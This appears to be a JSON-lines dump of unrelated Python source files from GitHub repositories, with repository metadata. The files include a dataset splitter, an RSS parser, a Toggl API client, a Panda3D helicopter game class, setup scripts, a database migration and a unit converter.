available\")\n\n self._array[index] = np.array(h5_f[key])\n\n def modify_shape(self, new_sample_shape):\n \"\"\"\n Modify the shape of the input samples X\n Parameters\n ----------\n new_sample_shape\n\n Returns\n -------\n\n \"\"\"\n for key, shape in zip(self._array.keys(), new_sample_shape):\n if shape is not None:\n sample_size = (self._array[key].shape[0],)\n self._array[key] = self._array[key].reshape((sample_size + shape))\n\n def split(self, validation_split = 0.1, test_split = 0.1):\n \"\"\"\n Split the dataset into train, test and valid sets given the percentage\n Parameters\n ----------\n validation_split : percentage of the dataset used for validation\n test_split : percentage of the dataset used for test\n\n Returns\n -------\n\n \"\"\"\n X_train, X_test, Y_train, Y_test = train_test_split(self._array[\"X\"], self._array[\"Y\"], test_size=test_split)\n X_train, X_valid, Y_train, Y_valid = train_test_split(X_train, Y_train, test_size=validation_split)\n\n self.train = {\"X\": X_train, \"Y\":Y_train}\n self.valid = {\"X\": X_valid, \"Y\":Y_valid}\n self.test = {\"X\": X_test, \"Y\": Y_test}\n\n def save(self, filename=\"data.h5\"):\n with h5py.File(filename, \"w\") as h5_f:\n main_group = h5_f.create_group(\"data\")\n sub_g1 = main_group.create_group('train')\n sub_g2 = main_group.create_group('valid')\n sub_g3 = main_group.create_group('test')\n\n sub_g1.create_dataset(\"samples\", data=self.train[\"X\"])\n sub_g1.create_dataset(\"labels\", data=self.train[\"Y\"])\n\n sub_g2.create_dataset(\"samples\", data=self.valid[\"X\"])\n sub_g2.create_dataset(\"labels\", data=self.valid[\"Y\"])\n\n sub_g3.create_dataset(\"samples\", data=self.test[\"X\"])\n sub_g3.create_dataset(\"labels\", data=self.test[\"Y\"])\n\n def get_class_probability(self, verbose=True):\n\n def get_label_probability(labels):\n each_class = np.sum(labels, axis=0)\n total = np.sum(each_class)\n\n class_probability = each_class / total\n inverse_class_probability = class_probability ** -1\n\n return class_probability, inverse_class_probability\n\n class_probability = {}\n inverse_class_probability = {}\n class_probability[\"train\"], inverse_class_probability[\"train\"] = get_label_probability(self.train[\"Y\"])\n class_probability[\"valid\"], inverse_class_probability[\"valid\"] = get_label_probability(self.valid[\"Y\"])\n class_probability[\"test\"], inverse_class_probability[\"test\"] = get_label_probability(self.test[\"Y\"])\n\n return class_probability, inverse_class_probability\n\n\nif __name__ == \"__main__\":\n file = \"example.h5\"\n\n dp = CreateDatasetPackage(filename=file, dataset_name = \"FullData\", keys=[\"X_full\", \"y_full\"])\n\n dp.modify_shape([(64, 64, 1)])\n dp.split()\n dp.save()\n\n class_probability, inverse_class_probability = dp.get_class_probability()\n\n for (key_cp, val_cp), (key_icp, val_icp) in zip(class_probability.items(), inverse_class_probability.items()):\n print(f\"Class Probability {key_cp} : {val_cp}\")\n print(f\"Inverse Class Probability {key_icp} : {val_icp}\")\n","repo_name":"CuriousSingularity/ai","sub_path":"data_preprocessor/data_formatter.py","file_name":"data_formatter.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70441684568","text":"from multiprocessing import Process\nfrom os import getpid\nfrom random import randint\nfrom time import time, sleep\n\ndef download_task(filename):\n print('Started downloading {}...'.format(filename))\n time_to_download = randint(5, 10)\n 
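# Simulate a download that takes a random 5-10 seconds.\n 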
sleep(time_to_download)\n print('{} finished downloading! Took {}s'.format(filename, time_to_download))\n\ndef main():\n start = time()\n P1 = Process(target = download_task, args=('Python从入门到住院.pdf', ))\n P1.start()\n P2 = Process(target = download_task, args=('Peking Hot.avi', ))\n P2.start()\n P1.join()\n P2.join()\n end = time()\n print('Total elapsed time: {:.2f}s'.format(end - start))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Yao-Phoenix/day_code","sub_path":"download_process.py","file_name":"download_process.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3768765997","text":"class Car:\n name = \"\"\n color = \"\"\n price = \"20 million $\"\n\n def start():\n print(\"Starting the engine\")\n\n\nCar.name = \"Tesla\"\nCar.color = \"black\"\n\nprint(\"Name of the car:\", Car.name)\nprint(\"Color :\", Car.color)\nprint(\"Price :\", Car.price)\n\nCar.start()\n","repo_name":"himu999/Python_oop","sub_path":"D.object_And_class/c_class_creating_with_changeable_attribute.py","file_name":"c_class_creating_with_changeable_attribute.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8136209642","text":"from cx_Freeze import setup, Executable\nimport os\nimport sys\n\nbase = None \n\nexecutables = [Executable(\"main.py\", base=base)]\n\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR,'tcl','tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\npackages = [\"idna\", \"pyglet\", \"math\", \"random\",\"numpy\",\"config\",\"cvsmr\",\"core\",\"cvsmm\",\"cvsms\",\"cvsmgmt\",\"tripy\",\"calculations\", \"time\"]\noptions = {\n 'build_exe': { \n 'packages':packages,\n 'include_files': [\"C:/Users/Austa Jiang/AppData/Local/Programs/Python/Python36-32/DLLs/tcl86t.dll\", \"C:/Users/Austa Jiang/AppData/Local/Programs/Python/Python36-32/DLLs/tk86t.dll\"]\n }, \n}\n\nsetup(\n name = \"\",\n options = options,\n version = \"\",\n description = '',\n executables = executables\n)\n","repo_name":"austalavista/civsim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6581803816","text":"import feedparser\nimport operator\nimport Utils.Time\n# We fetch the news through the RSS feed\n\n\ndef getrss(url):\n feed = feedparser.parse(url)\n feed[\"entries\"].sort(key=operator.itemgetter('date'))\n return feed\n\n\ndef getrssdays(feed):\n days = []\n for i in range(0, len(feed['entries'])):\n currentpost = feed['entries'][i]\n postdate = Utils.Time.formatTime((currentpost['date_parsed']))\n if postdate not in days:\n days.append(postdate)\n days.sort()\n return days\n\n\n\ndef getdayposts(feed, dayformatted):\n posts = []\n numposts = 0\n for i in range(0, len(feed['entries'])):\n currentpost = feed['entries'][i]\n postdate = Utils.Time.formatTime(currentpost['date_parsed'])\n if dayformatted == postdate:\n posts.append({\n 'title': currentpost.title,\n 'description': currentpost.summary,\n 'url': currentpost.link,\n })\n numposts += 1\n return posts\n","repo_name":"gonzarugil/BD","sub_path":"Utils/Rss.py","file_name":"Rss.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"1445305305","text":"import utilities\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError, HTTPError\nfrom base64 import b64encode\n\n\n# References https://developers.track.toggl.com/docs/authentication/index.html#http-basic-auth-with-api-token\ndef generateRequestHeader(apiToken:str):\n return {'content-type': 'application/json', 'Authorization' : 'Basic %s' % b64encode(f\"{apiToken}:api_token\".encode(\"ascii\")).decode(\"ascii\")}\n\ndef _makeRequestReturnJsonDict(url:str, requestHeader:dict):\n print(url, requestHeader)\n req = Request(url)\n for header in requestHeader:\n req.add_header(header, requestHeader[header])\n try:\n data = urlopen(req).read()\n data = utilities.jsonToDict(data)\n except URLError as e:\n print(e.reason)\n if isinstance(e, HTTPError):\n print(e.read().decode())\n raise e\n \n return data\n\n\ndef getAllProjects(apiEndpoint:str, requestHeader:dict):\n return _makeRequestReturnJsonDict(f\"{apiEndpoint}/me/projects\", requestHeader=requestHeader)\n \ndef getAllTimeEntries(apiEndpoint:str,startDateEpoch:int,endDateEpoch:int, requestHeader:dict):\n startDate = utilities.epochToYYYY_MM_DDString(startDateEpoch)\n endDate = utilities.epochToYYYY_MM_DDString(endDateEpoch)\n return _makeRequestReturnJsonDict(\n f\"{apiEndpoint}/me/time_entries?start_date={startDate}&end_date={endDate}\",\n requestHeader=requestHeader\n )","repo_name":"shehabattia96/togglToInvoice","sub_path":"toggl.py","file_name":"toggl.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8450985292","text":"from enum import Enum\n\n\nclass ActivityCategoryType(str, Enum):\n # DIRECT\n STATIONARY_COMBUSTION = \"STATIONARY_COMBUSTION\"\n MOBILE_COMBUSTION = \"MOBILE_COMBUSTION\"\n PROCESS_EMISSIONS = \"PROCESS_EMISSIONS\"\n FUGITIVE_EMISSIONS = \"FUGITIVE_EMISSIONS\"\n\n # ELECTRICITY\n PURCHASED_ELECTRICITY = \"PURCHASED_ELECTRICITY\"\n PURCHASED_STEAM_HEAT_COOLING = \"PURCHASED_STEAM_HEAT_COOLING\"\n\n # UPSTREAM\n PURCHASED_GOODS_AND_SERVICES = \"PURCHASED_GOODS_AND_SERVICES\"\n CAPITAL_GOODS = \"CAPITAL_GOODS\"\n FUEL_AND_ENERGY_RELATED_ACTIVITIES = \"FUEL_AND_ENERGY_RELATED_ACTIVITIES\"\n UPSTREAM_TRANSPORT_AND_DISTRIBUTION = \"UPSTREAM_TRANSPORT_AND_DISTRIBUTION\"\n WASTE_GENERATED_IN_OPERATIONS = \"WASTE_GENERATED_IN_OPERATIONS\"\n BUSINESS_TRAVEL = \"BUSINESS_TRAVEL\"\n EMPLOYEE_COMMUTING = \"EMPLOYEE_COMMUTING\"\n UPSTREAM_LEASED_ASSETS = \"UPSTREAM_LEASED_ASSETS\"\n\n # DOWNSTREAM\n DOWNSTREAM_TRANSPORT_AND_DISTRIBUTION = \"DOWNSTREAM_TRANSPORT_AND_DISTRIBUTION\"\n PROCESSING_OF_SOLD_PRODUCTS = \"PROCESSING_OF_SOLD_PRODUCTS\"\n USE_OF_SOLD_PRODUCTS = \"USE_OF_SOLD_PRODUCTS\"\n END_OF_LIFE_OF_SOLD_PRODUCTS = \"END_OF_LIFE_OF_SOLD_PRODUCTS\"\n DOWNSTREAM_LEASED_ASSETS = \"DOWNSTREAM_LEASED_ASSETS\"\n FRANCHISES = \"FRANCHISES\"\n INVESTMENTS = \"INVESTMENTS\"\n\n # OTHERS\n CUSTOM = \"CUSTOM\"\n","repo_name":"CarbonAltDelete/carbonaltdelete-client","sub_path":"carbon_alt_delete/activities/schemas/activity_category_type.py","file_name":"activity_category_type.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73891263768","text":"from typing import Tuple\r\nfrom panda3d.core import LVector3, LQuaternionf, LineSegs, NodePath\r\nfrom direct.actor.Actor import Actor\r\nimport pymunk\r\nfrom input import InputManager\r\nfrom utils import clamp, not_zero, 
radians_to_degrees, damp, move_towards, slerp, almost_zero, Direction\r\nfrom masks import CATEGORY_PLAYER, CATEGORY_WALL\r\nimport math\r\n\r\nimport weapons\r\nimport masks\r\nimport utils\r\n\r\nMAX_DIST_TO_GROUND = 200\r\n\r\nclass Chopper:\r\n width: float = 3.2\r\n hull_top: float = 1.25\r\n hull_mid: float = -0.25\r\n hull_floor: float = -1.0\r\n\r\n skid_floor: float = -1.5\r\n skid_height: float = 0.5\r\n\r\n rotor_floor: float = 1.5\r\n rotor_height: float = 0.25\r\n rotor_radius: float = 1.5\r\n\r\n scale: float = 1.0\r\n direction: Direction = Direction.RIGHT\r\n scene: \"scene.Scene\"\r\n space: pymunk.Space\r\n\r\n rescued: int = 0\r\n capacity: int = 4\r\n\r\n def __init__(self, scene: \"scene.Scene\", spawn_point: Tuple[float, float]):\r\n width, scale = self.width, self.scale\r\n space = scene.space\r\n self.spawn_point = spawn_point\r\n self.distance_to_ground = -1\r\n self.scene = scene\r\n self.space = space\r\n self.app = scene.app\r\n self.input = scene.app.input\r\n self.rescued = 0\r\n self.capacity = 4\r\n self.hp = 10\r\n self.team = 1\r\n self.flip_heading_t = 0\r\n self.flip_heading = False\r\n self.bodyNode = Actor(\"art/space-chopper/space-chopper.glb\")\r\n self.bodyNode.reparentTo(scene.root)\r\n self.bodyNode.loop(\"blade\")\r\n\r\n self.bodyNode.setShaderAuto()\r\n self.bodyNode.setTextureOff(1)\r\n for material in self.bodyNode.findAllMaterials():\r\n print(material)\r\n\r\n # self.shadowNode = self.bodyNode.attachNewNode(LensNode('shadowproj'))\r\n # #lens = PerspectiveLens()\r\n # lens = PerspectiveLens()\r\n # lens.setNearFar(1, 5)\r\n # self.shadowNode.node().setLens(lens)\r\n # self.shadowNode.node().showFrustum()\r\n # self.shadowNode.setHpr(0, -90, 0)\r\n # self.shadowNode.find('frustum').setColor(1, 0, 0, 1)\r\n # self.shadowNode.reparentTo(self.bodyNode)\r\n # self.shadowNode.setPos(0, 0, self.height)\r\n\r\n # tex = app.loader.loadTexture('art/space-chopper/shadow.png')\r\n # tex.setWrapU(SamplerState.WMBorderColor)\r\n # tex.setWrapV(SamplerState.WMBorderColor)\r\n # tex.setBorderColor((1, 1, 1, 0))\r\n # ts = TextureStage('ts')\r\n # ts.setSort(1)\r\n # ts.setColor((0.5, 0.5, 0.5, 0.5))\r\n # ts.setMode(TextureStage.MCombine)\r\n # ts.setCombineRgb(\r\n # TextureStage.CMInterpolate, \r\n # TextureStage.CSTexture, \r\n # TextureStage.COSrcColor,\r\n # TextureStage.CSPrevious,\r\n # TextureStage.COSrcColor,\r\n # TextureStage.CSTexture,\r\n # TextureStage.COOneMinusSrcColor\r\n # )\r\n # scene.worldNP.projectTexture(ts, tex, self.shadowNode)\r\n\r\n \r\n #self.roterNode = base.loader.loadModel(\"models/Roter.stl\")\r\n #self.roterNode.reparentTo(self.bodyNode)\r\n\r\n self.body = pymunk.Body(5, 100)\r\n self.body.position = self.spawn_point\r\n\r\n # hull\r\n hull_vertices = [\r\n (-width*scale, self.hull_mid*scale), \r\n (0, self.hull_floor*scale), \r\n (width*scale, self.hull_mid*scale), \r\n (0, self.hull_top*scale)\r\n ]\r\n self.hull_shape = pymunk.Poly(self.body, hull_vertices)\r\n self.hull_shape.friction = 0.5\r\n self.hull_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.hull_shape.collision_type = CATEGORY_PLAYER\r\n self.hull_shape.data = self\r\n \r\n # skids\r\n skid_vertices = [\r\n (-width*scale, self.skid_floor*scale), \r\n ( width*scale, self.skid_floor*scale), \r\n ( width*scale, (self.skid_floor + self.skid_height)*scale), \r\n (-width*scale, (self.skid_floor + self.skid_height)*scale)\r\n ]\r\n self.skid_shape = pymunk.Poly(self.body, skid_vertices)\r\n self.skid_shape.friction = 0.5\r\n 
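# Tag the skids with the player collision category so scene queries can filter them.\r\n 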
self.skid_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.skid_shape.collision_type = CATEGORY_PLAYER\r\n self.skid_shape.data = self\r\n\r\n # rotor\r\n rotor_vertices = [\r\n (-self.rotor_radius*scale, self.rotor_floor*scale), \r\n ( self.rotor_radius*scale, self.rotor_floor*scale), \r\n ( self.rotor_radius*scale, (self.rotor_floor + self.rotor_height)*scale), \r\n (-self.rotor_radius*scale, (self.rotor_floor + self.rotor_height)*scale)\r\n ]\r\n self.rotor_shape = pymunk.Poly(self.body, rotor_vertices)\r\n self.rotor_shape.friction = 0.5\r\n self.rotor_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.rotor_shape.collision_type = CATEGORY_PLAYER\r\n self.rotor_shape.data = self\r\n \r\n space.add(self.body, self.hull_shape, self.skid_shape, self.rotor_shape)\r\n\r\n self.weapons = [weapons.MachineGun(self.scene), weapons.RocketLauncher(self.scene)]\r\n\r\n self.snd = scene.app.loader.loadSfx(\"sound/571629__ugila__item-pickup.wav\")\r\n self.crash_snd = scene.app.loader.loadSfx(\"sound/587184__derplayer__explosion-02.wav\")\r\n \r\n self.debug_lines = LineSegs()\r\n self.debug_lines.setColor(1, 0, 0, 1)\r\n def draw_shape(vertices):\r\n self.debug_lines.moveTo(vertices[0][0], 0, vertices[0][1])\r\n for v in vertices[1:]:\r\n self.debug_lines.drawTo(v[0], 0, v[1])\r\n self.debug_lines.drawTo(vertices[0][0], 0, vertices[0][1])\r\n\r\n draw_shape(hull_vertices)\r\n draw_shape(skid_vertices)\r\n draw_shape(rotor_vertices)\r\n\r\n self.debug_lines.setThickness(4)\r\n self.debug_line_node = self.debug_lines.create()\r\n self.debug_line_np = NodePath(self.debug_line_node)\r\n self.debug_line_np.reparentTo(self.bodyNode)\r\n self.debug_line_np.setHpr(90, 0, 0)\r\n\r\n self.debug_line_np.hide()\r\n\r\n # self.dust_particles = ParticleEffect()\r\n # self.dust_particles.loadConfig(Filename(\"./art/effects/dust.ptf\"))\r\n # self.dust_particles.clearLight()\r\n # #self.dust_particles.start(scene.app.render)\r\n # self.dust_particles_active = False\r\n #\r\n # self.particles = Particles()\r\n # self.particles.setFactory(\"PointParticleFactory\")\r\n # self.particles.setRenderer(\"SpriteParticleRenderer\")\r\n # self.particles.setEmitter(\"SphereVolumeEmitter\")\r\n\r\n def destroy(self):\r\n self.space.remove(self.body, self.hull_shape, self.skid_shape, self.rotor_shape)\r\n self.bodyNode.cleanup()\r\n self.bodyNode.remove_node()\r\n\r\n def is_full(self) -> bool:\r\n return self.rescued >= self.capacity\r\n\r\n def velocity(self) -> float:\r\n return self.body.velocity.length\r\n\r\n def update(self, dt: float):\r\n im: InputManager = self.input\r\n\r\n # ground_intersection = self.ground_intersection(15)\r\n # if ground_intersection:\r\n # if not self.dust_particles_active:\r\n # self.dust_particles = ParticleEffect()\r\n # self.dust_particles.loadConfig(Filename(\"./art/effects/dust.ptf\"))\r\n # self.dust_particles.start(self.scene.app.render)\r\n # self.dust_particles_active = True\r\n # self.dust_particles.setPos(ground_intersection.point.x, 0.000, ground_intersection.point.y)\r\n # else:\r\n # if self.dust_particles_active:\r\n # self.dust_particles.softStop()\r\n # self.dust_particles_active = False\r\n\r\n if not_zero(im.throttle()):\r\n self.body.apply_force_at_local_point((0, 200 * im.throttle()), (0, 0))\r\n\r\n self.bodyNode.setPlayRate(5.0 + 15 * im.throttle(), \"blade\")\r\n\r\n if im.is_booster_rocket_pressed():\r\n self.body.apply_force_at_local_point((self.direction.value * 200, 0), (0, 0))\r\n \r\n if 
im.is_reverse_booster_rocket_pressed():\r\n self.body.apply_force_at_local_point((-self.direction.value * 200, 0), (0, 0))\r\n\r\n if im.is_face_left_pressed() and self.direction != Direction.LEFT:\r\n self.direction = Direction.LEFT\r\n self.flip_heading_t = 0\r\n self.flip_heading = True\r\n elif im.is_face_right_pressed() and self.direction != Direction.RIGHT:\r\n self.direction = Direction.RIGHT\r\n self.flip_heading_t = 0\r\n self.flip_heading = True\r\n\r\n if im.chopper_reset:\r\n im.chopper_reset = False\r\n self.reset()\r\n\r\n self.weapons[im.weapon_selection].update(dt)\r\n\r\n if im.fire_pressed:\r\n self.weapons[im.weapon_selection].fire(self, self.direction)\r\n\r\n if not_zero(im.pitch_axis()):\r\n self.body.apply_force_at_world_point((10 * im.pitch_axis(), 0), (self.body.position.x, self.body.position.y))\r\n self.body.apply_force_at_local_point((0, 200 * im.pitch_axis()), (-self.width, 0))\r\n self.body.apply_force_at_local_point((0, -200 * im.pitch_axis()), (self.width, 0))\r\n\r\n self.distance_to_ground = self.calculate_distance_to_ground()\r\n\r\n # if self.distance_to_ground > 50:\r\n # self.body.apply_force_at_world_point((0, (self.distance_to_ground / MAX_DIST_TO_GROUND) * -200.0), (self.body.position.x, self.body.position.y))\r\n # if self.distance_to_ground == -1:\r\n # self.body.apply_force_at_world_point((0, -200.0), (self.body.position.x, self.body.position.y))\r\n\r\n if self.distance_to_ground > 100 and self.body.velocity.y > 0:\r\n self.body.velocity = self.body.velocity.x, damp(self.body.velocity.y, 0.05, dt)\r\n self.body.apply_force_at_world_point((0, -8), (self.body.position.x, self.body.position.y))\r\n\r\n #damping_rate = 1.0 - clamp(self.velocity() / 100, 0, 1)\r\n #self.body.velocity = damp(self.body.velocity, damping_rate, dt)\r\n self.body.angular_velocity = damp(self.body.angular_velocity, 0.15, dt)\r\n\r\n self.pos = self.body.position\r\n rot = self.body.angle\r\n\r\n while rot < 0:\r\n rot += math.pi * 2\r\n while rot > math.pi * 2:\r\n rot -= math.pi * 2\r\n\r\n self.body.angle = rot\r\n\r\n self.bodyNode.setPos(self.pos.x, 0, self.pos.y)\r\n\r\n\r\n if self.flip_heading:\r\n if self.flip_heading_t >= 1.0:\r\n self.flip_heading_t = 1.0\r\n self.flip_heading = False\r\n\r\n src_rotation = LQuaternionf()\r\n src_rotation.setHpr(LVector3(90 * -self.direction.value, radians_to_degrees(rot) * self.direction.value, 0))\r\n target_rotation = LQuaternionf()\r\n target_rotation.setHpr(LVector3(90 * self.direction.value, -radians_to_degrees(rot) * self.direction.value, 0))\r\n self.bodyNode.setQuat(slerp(src_rotation, target_rotation, self.flip_heading_t))\r\n self.flip_heading_t = move_towards(self.flip_heading_t, 1.0, 5.0, dt)\r\n else:\r\n self.bodyNode.setHpr(LVector3(90 * self.direction.value, -radians_to_degrees(rot) * self.direction.value, 0))\r\n\r\n def ground_intersection(self, dist):\r\n segment_query_info_list = self.space.segment_query((self.body.position.x, self.body.position.y), (self.body.position.x, self.body.position.y - dist), 0.1, pymunk.ShapeFilter(mask=CATEGORY_WALL))\r\n segment_query_info_list.sort(key=lambda x: x.alpha)\r\n if len(segment_query_info_list) == 0: return None\r\n return segment_query_info_list[0]\r\n\r\n def calculate_distance_to_ground(self):\r\n segment_query_info_list = self.space.segment_query((self.body.position.x, self.body.position.y), (self.body.position.x, self.body.position.y - MAX_DIST_TO_GROUND), 0.1, pymunk.ShapeFilter(mask=CATEGORY_WALL))\r\n segment_query_info_list.sort(key=lambda x: x.alpha)\r\n if 
len(segment_query_info_list) == 0: return -1\r\n if almost_zero(segment_query_info_list[0].alpha): return 0\r\n return (segment_query_info_list[0].point - self.body.position).length\r\n\r\n def collision(self, other):\r\n if other.shape.collision_type == masks.CATEGORY_HUMANOID:\r\n if self.body.velocity.length > 15:\r\n if not other.dead:\r\n other.hurt(100)\r\n else:\r\n if not other.dead and self.rescued < self.capacity:\r\n other.destroyed = True\r\n self.rescued += 1\r\n self.snd.play()\r\n elif other.shape.collision_type == masks.CATEGORY_WALL:\r\n angle = utils.normalizeAngle(self.body.angle, 0.0)\r\n if abs(angle) > math.pi * 0.66:\r\n self.reset()\r\n\r\n def reset(self):\r\n self.body.position = self.spawn_point\r\n self.body.angle = 0\r\n self.hp = 10\r\n self.crash_snd.play()\r\n\r\n def hurt(self, damage):\r\n self.hp -= damage\r\n\r\n if self.hp <= 0:\r\n self.reset()\r\n","repo_name":"fathat/pyweek34","sub_path":"chopper.py","file_name":"chopper.py","file_ext":"py","file_size_in_byte":13132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42281103251","text":"from setuptools import setup, find_packages\nfrom os import path\n\n# Get the long description from the README file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pyepgnotify\",\n version=\"0.1.3\",\n license=\"GPLv3\",\n url=\"https://github.com/Aikhjarto/pyepgnotify.git\",\n download_url=\"https://github.com/Aikhjarto/pyepgnotify/archive/v0.1.3.tar.gz\",\n keywords=[\"VDR\", \"EPG\", \"mail\", \"notification\"],\n author=\"Thomas Wagner\",\n author_email=\"wagner-thomas@gmx.at\",\n description=\"Reads EPG data from VDR and sends user notification mails when desired programs are found\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n ],\n packages=find_packages(),\n python_requires=\">=3.5\",\n install_requires=[\"pyyaml\"],\n entry_points={\"console_scripts\": [\"pyepgnotify=pyepgnotify.epgnotify:main\"]},\n data_files=[(\"pyepgnotify\", [\"epgnotify.yml\"])],\n)\n","repo_name":"Aikhjarto/pyepgnotify","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73341833687","text":"\"\"\"Add attach_ical to RegistrationForm\n\nRevision ID: f26c201c8254\nRevises: 26985db8ed12\nCreate Date: 2021-02-15 10:52:15.353452\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f26c201c8254'\ndown_revision = '26985db8ed12'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('forms', sa.Column('attach_ical', sa.Boolean(), nullable=False,\n server_default='false'), schema='event_registration')\n op.alter_column('forms', 'attach_ical', server_default=None, schema='event_registration')\n\n\ndef downgrade():\n op.drop_column('forms', 'attach_ical', 
schema='event_registration')\n","repo_name":"indico/indico","sub_path":"indico/migrations/versions/20210215_1052_f26c201c8254_add_attach_ical_to_registrationform.py","file_name":"20210215_1052_f26c201c8254_add_attach_ical_to_registrationform.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1560,"dataset":"github-code","pt":"31"} +{"seq_id":"22575465127","text":"# Problem 2. (Applying the set data structure)\n# A vector v is called beautiful if every number in v appears exactly once.\n# Determine the minimum number of elements that must be deleted from v so that v becomes beautiful.\n\ndef minDeletionsToMakeBeautiful(vector):\n # Initialize a dictionary to track how many times each element has been seen, and a counter for the deletions.\n counts = {}\n deletions = 0\n\n # Iterate over every element in the vector.\n for number in vector:\n # Check whether the element has already appeared in the counts dictionary.\n if number in counts:\n # If it has appeared before, increment deletions: this duplicate must be removed to make the vector beautiful.\n deletions += 1\n else:\n # If the element has never appeared before, record it in the counts dictionary.\n counts[number] = 1\n\n # Return deletions, i.e. the number of elements that must be removed to make the vector beautiful.\n return deletions\n\n\nvector = [3, 4, 2, 2, 6, 6, 3, 7, 8]\ndeletions_needed = minDeletionsToMakeBeautiful(vector)\nprint(f\"At least {deletions_needed} elements must be deleted to make the vector beautiful.\")\n\n\n","repo_name":"haiknt2002/TTUD_TH1","sub_path":"Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090118199","text":"# Imports\r\nfrom typing import Union\r\nfrom resources.metric_conversion_constants import (\r\n SYMBOLS,\r\n CONVERSION_TYPES,\r\n IMPERIAL_MASS_UNITS,\r\n METRIC_MASS_UNITS,\r\n IMPERIAL_VOLUME_UNITS,\r\n METRIC_VOLUME_UNITS,\r\n IMPERIAL_LENGTH_UNITS,\r\n METRIC_LENGTH_UNITS,\r\n TIME_UNITS,\r\n TEMPERATURE_UNITS,\r\n)\r\n\r\n\r\n# Function definitions\r\n\r\n\r\ndef _check_arg_validity(\r\n base_type: str, quantity: Union[int, float], start_unit: str, end_unit: str\r\n) -> dict:\r\n\r\n \"\"\"\r\n Checks user parameters to ensure they are valid for conversion.\r\n :param base_type: User provided base type for conversion, like length, mass, etc.\r\n :param quantity: Initial value to be converted.\r\n :param start_unit: Starting unit describing initial value provided by user.\r\n :param end_unit: target unit for initial value to be converted to from the starting unit.\r\n :return: A dictionary of flags indicating the validity of user arguments.\r\n \"\"\"\r\n # Initialization\r\n type_flags = {\r\n \"good_base\": False,\r\n \"good_quantity\": False,\r\n \"good_start_unit\": False,\r\n \"good_end_unit\": False,\r\n \"start_end_match\": False,\r\n }\r\n\r\n # Checks / Decisioning\r\n if base_type in CONVERSION_TYPES:\r\n type_flags[\"good_base\"] = True\r\n\r\n if isinstance(quantity, (int, float)):\r\n type_flags[\"good_quantity\"] = True\r\n if (\r\n start_unit in IMPERIAL_MASS_UNITS\r\n or start_unit in METRIC_MASS_UNITS\r\n or start_unit in IMPERIAL_LENGTH_UNITS\r\n or start_unit in METRIC_LENGTH_UNITS\r\n or start_unit in IMPERIAL_VOLUME_UNITS\r\n or start_unit in METRIC_VOLUME_UNITS\r\n or start_unit in TIME_UNITS\r\n or start_unit in TEMPERATURE_UNITS\r\n ):\r\n 
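# start_unit matched one of the known mass/volume/length/time/temperature unit tables.\r\n 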
type_flags[\"good_start_unit\"] = True\r\n\r\n if (\r\n end_unit in IMPERIAL_MASS_UNITS\r\n or end_unit in METRIC_MASS_UNITS\r\n or end_unit in IMPERIAL_LENGTH_UNITS\r\n or end_unit in METRIC_LENGTH_UNITS\r\n or end_unit in IMPERIAL_VOLUME_UNITS\r\n or end_unit in METRIC_VOLUME_UNITS\r\n or end_unit in TIME_UNITS\r\n or end_unit in TEMPERATURE_UNITS\r\n ):\r\n type_flags[\"good_end_unit\"] = True\r\n\r\n if type_flags[\"good_start_unit\"] and type_flags[\"good_end_unit\"]:\r\n if (\r\n start_unit in IMPERIAL_MASS_UNITS or start_unit in METRIC_MASS_UNITS\r\n ) and base_type == \"mass\":\r\n if (\r\n end_unit in IMPERIAL_MASS_UNITS or end_unit in METRIC_MASS_UNITS\r\n ) and base_type == \"mass\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in IMPERIAL_VOLUME_UNITS or start_unit in METRIC_VOLUME_UNITS\r\n ) and base_type == \"volume\":\r\n if (\r\n end_unit in IMPERIAL_VOLUME_UNITS or end_unit in METRIC_VOLUME_UNITS\r\n ) and base_type == \"volume\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in IMPERIAL_LENGTH_UNITS or start_unit in METRIC_LENGTH_UNITS\r\n ) and base_type == \"length\":\r\n if 